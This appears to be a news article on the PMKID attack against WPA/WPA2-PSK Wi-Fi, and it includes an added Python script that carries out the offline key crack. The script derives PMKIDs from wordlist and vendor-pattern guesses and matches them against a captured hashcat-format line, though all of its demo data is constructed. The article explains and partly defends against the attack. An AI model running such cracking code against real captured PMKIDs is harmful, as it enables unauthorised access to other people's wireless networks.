A new attack on the WPA/WPA2 Wi-Fi Protected Access protocols has been discovered. The technique for cracking WPA PSK (Pre-Shared Key) passwords lets an attacker outside the network capture the material needed for an offline password-guessing attack with far less effort than before.
The discovery of the attack was accidental – the Hashcat developers came across the new attack while testing the security of the upcoming WPA3 authentication method for wireless networks.
The new technique captures the Pairwise Master Key Identifier (PMKID), a value the access point itself sends in the RSN information element of the first EAPOL frame of the handshake. As the developers who devised the technique explain, it works against 802.11i/p/q/r networks with roaming functions enabled. This means that most modern routers are potentially at risk.
What is the difference between the new attack and previous WPA/WPA2 cracks?
According to Hashcat developer Jens “Atom” Steube, the most significant difference between older attacks and the newly discovered method is that an attacker no longer needs another user to be on the targeted network to capture credentials. All that is needed is to initiate the authentication process with the access point.
The researcher also added that earlier WPA/WPA2 attacks were more challenging to carry out, because “in the past the attacker had to record the WPA four-way handshake to launch an offline attack”. That may sound simple, but in practice capturing a usable handshake is technically troublesome.
The new attack is much easier to pull off, because “if you receive the PMKID from the access point, you will be able to get into the network if you can guess the [WPA] pre-shared key (PSK)”.
The success of the attack depends on the length and complexity of the pre-shared key. Most users never change the PSK on their routers and keep the manufacturer-generated key, which gives attackers a starting point for guessing. Cracking becomes easier still when a manufacturer generates PSKs following a pattern that can be traced back to the router model, because the candidate space shrinks to that pattern.
In a nutshell, here’s why this attack is much better than previous techniques:
– No more regular users required – because the attacker directly communicates with the AP (aka “client-less” attack)
– No more waiting for a complete 4-way handshake between the regular user and the AP
– No more possible retransmissions of EAPOL frames (which can produce uncrackable captures)
– No more possible invalid passwords sent by the regular user (a handshake recorded from a client that typed the wrong password cannot yield the real one)
– No more lost EAPOL frames when the regular user or the AP is too far away from the attacker
– No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds)
– No more special output format (pcap, hccapx, etc.) – final data will appear as regular hex encoded string
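The offline step described above, as an added example that is not part of the original article or of the Hashcat project's code: the standard 802.11i derivation (PMK = PBKDF2-HMAC-SHA1 over passphrase and SSID, PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || client MAC)) is recomputed for each candidate passphrase and compared with the captured PMKID. Input is a plain hex line in hashcat's PMKID layout (PMKID*MAC_AP*MAC_STA*SSID), matching the last list item. The MAC addresses, SSID, passphrases, wordlist and the "captured" lines are all constructed inside the script from known passphrases so it runs offline; the vendor-style key pattern is hypothetical and deliberately tiny.

```python
import hashlib
import hmac
import itertools

# Constructed demo network (assumed values, not from any real capture).
AP_MAC = bytes.fromhex("c0ffee000001")   # BSSID of the target AP
STA_MAC = bytes.fromhex("deadbeef0002")  # MAC of the attacker's own client
SSID = b"HomeNet-7F3A"


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid, 4096, 32)


def compute_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA) for the PSK AKM (802.11i)."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def to_16800_line(pmkid: bytes, ap_mac: bytes, sta_mac: bytes, ssid: bytes) -> str:
    """Hex line in hashcat's PMKID layout: PMKID*MAC_AP*MAC_STA*SSID(hex)."""
    return "*".join((pmkid.hex(), ap_mac.hex(), sta_mac.hex(), ssid.hex()))


def parse_16800_line(line: str):
    """Split a PMKID line back into its four byte fields."""
    pmkid_hex, ap_hex, sta_hex, ssid_hex = line.strip().split("*")
    return (bytes.fromhex(pmkid_hex), bytes.fromhex(ap_hex),
            bytes.fromhex(sta_hex), bytes.fromhex(ssid_hex))


def crack_pmkid(line: str, candidates):
    """Offline guess: derive PMK and PMKID per candidate, compare with the captured PMKID."""
    target, ap_mac, sta_mac, ssid = parse_16800_line(line)
    for guess in candidates:
        derived = compute_pmkid(pmk_from_passphrase(guess, ssid), ap_mac, sta_mac)
        if hmac.compare_digest(derived, target):
            return guess
    return None


def pattern_candidates(prefix: str, alphabet: str, length: int):
    """Hypothetical vendor-style default keys: fixed prefix plus `length` chars from `alphabet`."""
    for tail in itertools.product(alphabet, repeat=length):
        yield prefix + "".join(tail)


def build_capture(passphrase: str) -> str:
    """Constructed capture line; a real one comes from the AP's first EAPOL frame."""
    pmk = pmk_from_passphrase(passphrase, SSID)
    return to_16800_line(compute_pmkid(pmk, AP_MAC, STA_MAC), AP_MAC, STA_MAC, SSID)


WORDLIST = ["password", "12345678", "Sunflower2017", "letmein123"]  # constructed

if __name__ == "__main__":
    # Case 1: a user-chosen passphrase recovered from a short wordlist.
    line1 = build_capture("Sunflower2017")
    print(line1)
    print("wordlist hit:", crack_pmkid(line1, WORDLIST))
    # Case 2: a default key following an assumed pattern (prefix + two hex digits, 256 candidates).
    line2 = build_capture("Setup-a7")
    print("pattern hit:", crack_pmkid(line2, pattern_candidates("Setup-", "0123456789abcdef", 2)))
```

Each candidate costs one PBKDF2 run of 4096 SHA-1 rounds, which is why the attack is only practical against short, patterned or dictionary keys; a long random PSK keeps the candidate space out of reach even though the PMKID itself is trivial to obtain.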
Who is affected?
At this time, the researchers are not sure which vendors or how many routers this technique will work against, but they expect it to work against all 802.11i/p/q/r networks with roaming functions enabled. In short, this means most modern routers.